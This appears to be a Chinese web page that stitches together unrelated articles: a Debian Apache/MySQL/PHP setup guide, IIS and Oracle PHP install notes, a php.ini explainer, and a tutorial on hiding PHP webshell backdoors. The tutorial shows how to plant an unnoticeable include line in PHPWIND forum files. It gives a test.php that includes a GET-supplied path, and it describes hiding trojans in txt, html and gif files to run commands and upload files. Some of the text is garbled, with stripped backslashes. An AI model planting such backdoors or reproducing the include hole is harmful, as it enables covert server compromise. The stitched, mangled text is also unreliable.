Debian下Apache2 Mysql5 Php5的安装配置

安装AMP

apt-get install apache2 mysql-server php5 php5-mysql5

配置 Apache2 默认站点

vi /etc/apache2/sites-enabled/000-default

加入一行

RedirectMatch ^/$ /apache2-default/

试验这一步不需要

修改 Apache2 主配置

vi /etc/apache2/apache2.conf

要改为：

Include module configuration:

Include /etc/apache2/mods-enabled/*.load Include /etc/apache2/mods-enabled/*.conf

还有：

AddType application/x-httpd-php .php

AddType application/x-httpd-php-source .phps

重新启动 Apache2

/etc/init.d/apache2 reload

现在要配置 PHP 5

vi /etc/php5/apache2/php.ini

Php5 默认已经不支持 Mysql，为了打开支持，要修改

extension=mysql.so

设置 Mysql 根密码

默认安装的 Mysql，其 root 用户没有密码，实在危险，我们为他加一个密码。

mysqladmin -uroot password 'abc123'

其中abc123就是你的密码。

当然你也可以用下面的命令来设置密码：

mysql -u root mysql

mysql> update user set password=password('pass') where user='root';

为将要架设的站点建一个库及其用户

mysql -u root -p mysql

mysql> create database drupal;

mysql> use drupal;

mysql> grant all on drupal.* to drupal_user@localhost;

mysql> use mysql;

Database changed

mysql> update user set password=password('pass') where user = 'drupal_user';

Query OK, 1 row affected (0.00 sec)

Rows matched: 1 Changed: 1 Warnings: 0

mysql>q;

mysqladmin reload

最近很多朋友都在问我是否能把我那一句话木马隐藏到HTML或图片里，其实把一句话木马插入到PHP文件中就已经很隐蔽了，假如说硬是要放到HTML文件或图片里，就接着往下看的这篇测试报告吧。

要知道假如光把PHP语句放到图片里是无论如何也不能执行的，因为PHP只解析扩展名为php的文件。所以说要能使隐藏在图片里的PHP语句执行。我们就的借助PHP中的调用函数 ：include 、require 等。

　　我们还记得前些日子把木马隐藏到图片的文章吧。也就是在PHP文件里用include("x.gif")这样的语句来调用隐藏在图片的木马语句。ASP中语句也类似。看似非常隐蔽但直接调用图片对稍微懂点PHP的人就不难发现可疑之处。由于URL 里用GET方式很难传递参数，这就使得插入木马的性能得不到发挥。

　　Include 函数在PHP中使用的比较频繁，所以引起的安全问题也实在太多，例如PHPWIND1.36的漏洞就是因为include后面的变量没做过滤引起的。由此我们就可以构造类似的语句来插入到PHP文件中。然后把木马隐藏到图片或HTML文件里，可以说隐蔽性就更高了。如在PHPWIND论坛里插入下面的语句：

CODE：

<?@include includ/.$PHPWIND_ROOT；?>

一般治理员是无法看出来的。

　　有了include 函数来辅助帮忙我们就可以把PHP木马隐藏到 诸如 txt、html和图片文件等很多类型的文件里来了。因为txt、html和图片文件这三种类型的文件最无论在论坛还是文章系统里是最为常见的了，下面我们就依次来做测试。

　　首先建立一PHP文件test.php 文件内容为:

CODE：
<?php
$test=$_GET['test']；
@include 'test/'.$test；
?>

　　Txt文件一般都是说明文件，所以我们把一句话木马放到目录的说明文件里就OK了。随便建立一个TXT文件t.txt。我们把一句话木马粘贴到 t.txt文件里。然后访问 hxxp://localhost/test/test.php?test=../t.txt 假如你看到t.txt的内容就证实Ok了， 然后把在lanker微型PHP后门客户端 木马地址添入 hxxp://localhost/test/test.php?test=../t.txt 密码里添入cmd就可以了，执行返回的结果都可以看到。

　　对于HTML的文件，一般都为模版文件。为了使插入到HTML的文件的木马能被调用执行而且不被显示出来，我们可以在HTML里加入一个隐藏属性的文本框 ，如： 然后使用方法同上。执行的返回结果一般都可以查看源文件看到。 如使用查看本程序目录功能。查看源文件内容为 我可以得到目录为 C:Uniserver2_7swwwtest。

　　下面我们说说图片文件，要说最为毒的一招莫过于把木马隐藏到图片里。我们可以直接对一个图片进行编辑，把插入到图片末尾

　　经测试一般都不会对图片造成影响。然后同样方法客户端木马地址添入

　　我们查看PHP环境变量 返回的是结果是原图片。

　　这里可能要和我们想象的结果有些差距了，其实命令已经运行了，只是返回的结果看不到而已，因为这是真正的GIF文件，所以是不会显示返回结果的，为了证实是否真的执行了命令我们执行上传文件命令。果不出所料，文件已经成功上传到服务器上。这样伪造的优点是隐蔽性好。缺点也自然不用说了是没回显。假如你想看到返回的结果，那就拿出记事本伪造一个假的图片文件吧。

一、首先把php的压缩包（这里以php4.3.2为例）解压到c:php-4.3.2-win32目录中，然后从其中找到一个叫php.ini-recommended的文件,把他更名为php.ini。

二、打开该文件，找到extension_dir = "./" ，将其改为 extension_dir = "c:php-4.3.2-win32extensions" ；再找到 session.save_path = /tmp ，将其改为 session.save_path = c:php-4.3.2-win32sessions 。（注：此时你需要在c:php-4.3.2-win32目录下建立sessions文件夹，以存放session 。）

三、将修改好的php.ini文件拷贝至c:winnt目录下，将c:php-4.3.2-win32下的php4ts.dll文件拷贝到c:winntsystem32目录下。

四、打开"internet服务治理器"，选择你想支持php的站点，打开属性页，点击"isapi筛选器"选项卡，点击"添加"，在弹出的"筛选器属性"窗口的"筛选器名称"中填入"php"；在"可执行文件"中填入"c:php-4.3.2-win32sapiphp4isapi.dll"（如图一所示），点击确定。

五、点击"主目录"选项卡，选择"应用程序设置"中的"配置"按钮，在弹出的"应用程序配置"窗口中点击"添加"按钮，在弹出的"添加/编辑应用程序扩展名映射"窗口中的"可执行文件"中填入"c:php-4.3.2-win32sapiphp4isapi.dll"，"扩展名"一项填入"php" 。

ok，一切搞定，重起iis，到你的页面文件目录下写一个phpinfo，测试一下php文件能否被正确解析。假如产生500错误，请确定你没有忘记第三步。

经过一夜的“奋战”，终于把ORACLE装上了，而且PHP脚本调用ORACLE数据库也成功了，现在就和大家共同分享。
（注：现在网上一些资料都说oracle8.1.6 php4.0.4 apache1.3.2可以成功
安装，可是我和一个朋友试过了几次都不能成功，如有高手请指教，最好具体一些。）

1.硬件环境：

硬盘：9.2 G ; 内存：128 M ; 网卡：EEpor100

2.软件

操作系统：

RedHat 6.1（***大家注重，一定是6.1啊***）

3.优化RedHat 6.1
过程和上一篇文章一样，请参考上一篇文章《在Linux下安装PHP,APACHE,MYSQL,PERL的方法》作者：sucre_tiger

4.安装和优化mm,oracle,apache,php,,perl,mode_perl

1) 文件
mm: mm-1.1.3.tar.gz
oracle: oracle.8.1.16(第二版)
apache: apache_1.3.12.tar.gz
php: php-4.0.0.tar.gz(正式版)
mode_perl: mod_perl-1.24.tar.gz
perl-DBI: DBI-1.14.tar.gz
DBD-Oracle-1.06.tar.gz
Data-Dumper-2.101.tar.gz
Data-ShowTable-3.3.tar.gz
perl: perl-5.6.0.tar.gz

解压文件：

tar -zxpf 文件名

注重：以下所有的预编译和安装必须在要安装的软件目录下

#) 安装mm
(注：MM可以采用新的算法，来优化系统，还能设置对CPU的支持，推荐安装)
./configure
--disable-shared
--prefix=/usr
make
make test
make install
make clean
（注：make clean在安装完一个模块后，将清除前面的一些设置，防止冲突）

#) ORACLE的安装
因为ORACLE的安装过为复杂，很难一笔带过，下一次会有一篇专门的文档来介绍ORACLE的安装。

#) apache 的预编译

CC="egcs"
OPTIM="-O9 -funroll-loops -ffast-math -malign-double -mcpu=pentiumpro
-march=pentiumpro -fomit-frame-pointer -fno-exceptions"
CFLAGS="-DDYNAMIC_MODULE_LIMIT=0"
./configure
--prefix=/apache

#) php的预编译

CC="egcs"
OPTIM="-O9 -funroll-loops -ffast-math -malign-double -mcpu=pentiumpro
-march=pentiumpro -fomit-frame-pointer -fno-exceptions"
./configure

今天，我们来侃侃PHP.INI文件中的一些有趣的内容吧。

　　PHP.INI文件相信每位PHP爱好者都不会生疏，在PHP的上一个版本PHP3.0中它被命名为PHP3.INI。用NOTEPAD打开它，文件通常在操作系统的Windows目录下。大家都看到，PHP.INI文件里面有很多分号“”，和Windows系统一样，这些分号用来表示注解，也就是说为了配置文件清楚易懂，开发者在分号后面对每个配置功能做了简短说明，系统处理时会忽略这些注解行。当然，另外一个好处是，当PHP系统配置有变化的时候，我们可以对某些行加上或去掉注解就行了，简单又方
便。

　　auto_prepend_file string 可以指定一个文件自动地在读取所有php文件之前解析执行，可以为PHP、ASP、HTML等任何文件（不过图像文件可不行），在非凡时候倒是很有用。比如你想在每个PHP页面上增加一段广告，又假设你在开发一个网站，想让所有访问者在读取任何PHP页面之前进行身份验证，你就可以把你的验证代码作成单独文件，然后在这里设置string为该文件名就行啦。细心的读者要问了：假如我只是某些文件需要这些功能，可怎么办呀，开动脑筋吧，举个例子：

　　myprefix.php文件
　　<?php
　　if (strstr(strtoupper( PHP_SELF),"/PHPTEST/"))
　　echo "我的广告！<BR>";
　　?>

　　这样只要设置：auto_prepend_file=“myprefix.php”，那么所有phptest目录下的PHP文件就都包含你的广告头啦！还需要说明的是这个文件应该放在include_path所指的路径里面，不然可能会出错的，下面就会提到它。

　　auto_append_file string 和上面功能类似，只是自动加在PHP文件末尾，而且PHP程序用exit()退出时就不管用了。有了这个功能，我们可以易如反掌地添加公司地址的脚注了！

　　include_path string 这个参数的作用是让include()、require()等函数在这里所定义的路径中查找文件，是不是有点象DOS时代里用的SET PATH命令？这个参数可以提供一个路径列表，不过在UNIX中路径间用冒号分隔，在NT中用分号，而且斜杠的方向也不相同。如：
UNIX例：include_path=.:/home/lib
NT 例：include_path=".:c:homeib" 其中“.”表示当前目录。
gpc_order string

　　GPC是GET/POST/COOKIE三种变量的第一个字母，它的顺序体现系统处理三种变量的优先级别，从左到右，优先权依次递增。默认设置为GPC，这样当有其中任两种或三种名称相同变量传递到服务器时，系统会按优先权排序，只读取优先权较高的变量。又比如设定成 “GP” 表示忽视 cookie，并在存取方法 (method) 相同时，以 POST 取代GET。当然，我们在编程过程中应当尽量避免同时用不同的方式传递名称相同的变量，否则程序的可读性会变坏，而且在配置不同的系统里可能会有不同的输出结果。

　　magic_quotes_gpc boolean 这个参数能确定包含在GET/POST/COOKIE这三种变量中的非凡字符：单引号、双引号、斜杠，是否加转义字符反斜杠（就是C语言里常用的“”）？因为在PHP数据库等系统中，单引号等字符通常有非凡意义，为了和真正的字符区分，我们可以设置magic_quotes_gpc=on，这样假如我们从用户端得到的变量中有单引号时，会在前面加转义符，然后我们可以根据需要用函数stripslashes(string str);（该函数可去掉字串中的反斜杠转义符“”。若是连续二个反斜杠，则去掉一个，留下一个。若只有一个反斜杠，就直接去掉。）来去掉转义符“”,我们可以比较一下：

　　<form>
　　<input type="Text" value="" name="a">
　　<input type="Submit">
　　</form>
　　<?php
　　echo a;
　　?>

　　让我们分别在magic_quotes_gpc=on和off的情况下，在文本框中输入单引号、双引号，然后提交，看看有什么区别？

　　SMTP string 指定邮件发送服务器的域名或IP地址，这样我们就可以发信啦，比起微软的ASP来，PHP的这个功能简单方便得多了，有人要问,假如我没有配备邮件服务器怎么办?很简单,只要填上当地ISP的邮件服务器就行了。其实收发邮件服务器就像我们现实生活中的邮局一样，在哪个邮局都能发信，而收信是在固定邮局。

　　mysql.default_host string
　　mysql.default_user string
　　mysql.default_password string

　　用过ODBC的读者们都知道，设置ODBC的时候总需要设置数据库所在及其默认的登录用户名和口令，这几个参数也是这个意思，不过是用在MYSQL里面罢了。为了安全起见，我们还有必要在MYSQL里对该用户的权力做一些限定，千万不要偷懒用“root“啊！假如为了方便而设置了这些参数，那我们就能直接用函数mysql_connect()来连接数据库了，注重这里可以不用任何参数！

　　大家可能在想，虽然这样很方便，同时也很危险呀！别急，在PHP的安全模式里这些参数是无效的，下面我们来看看安全模式的设置吧。

　　Safe mode boolean 这可不是WINDOWS 98的安全模式啊。当PHP系统处于安全模式下时，我们就能对PHP程序的行为进行一定的控制，这时候一些数据库比如MYSQL、INFOMIX等的默认数据库主机、用户名、口令等设置无效，非法用户就不能轻易连接数据库了。而且在安全模式下safe_mode_allowed_env_vars string该项设置表示什么类型的系统环境变量可以被程序更改，若设置成safe_mode_allowed_env_vars=PHP_则表示只有PHP_打头的系统环境变量可以被修改，例如这时假如在程序中企图使用putenv("windir=UUU");来修改环境变量，系统就会提示一个安全模式的保护错误。还有，安全模式对系统命令system()等有一定限制，如只能在指定目录运行等，这样能对系统文件有一定的保护作用。

　　log_errors boolean 这个参数指定PHP程序出错时是否要将错误信息记录在 LOG文档中。在NT系统中假如我们同时设置error_log =syslog的话，我们就能在事件查看器的应用程序日志里看到PHP所发生过的错误信息，这对测试一个大型的系统有些帮助。

error_prepend_string = "<font color=ff0000>"
error_append_string = "</font>"

　　这两个设置参数更有意思啦，按如上设置，那么我们一眼就能看到：我们的程序是否出错了！因为他的功能是把出错信息设置成显眼的红颜色了。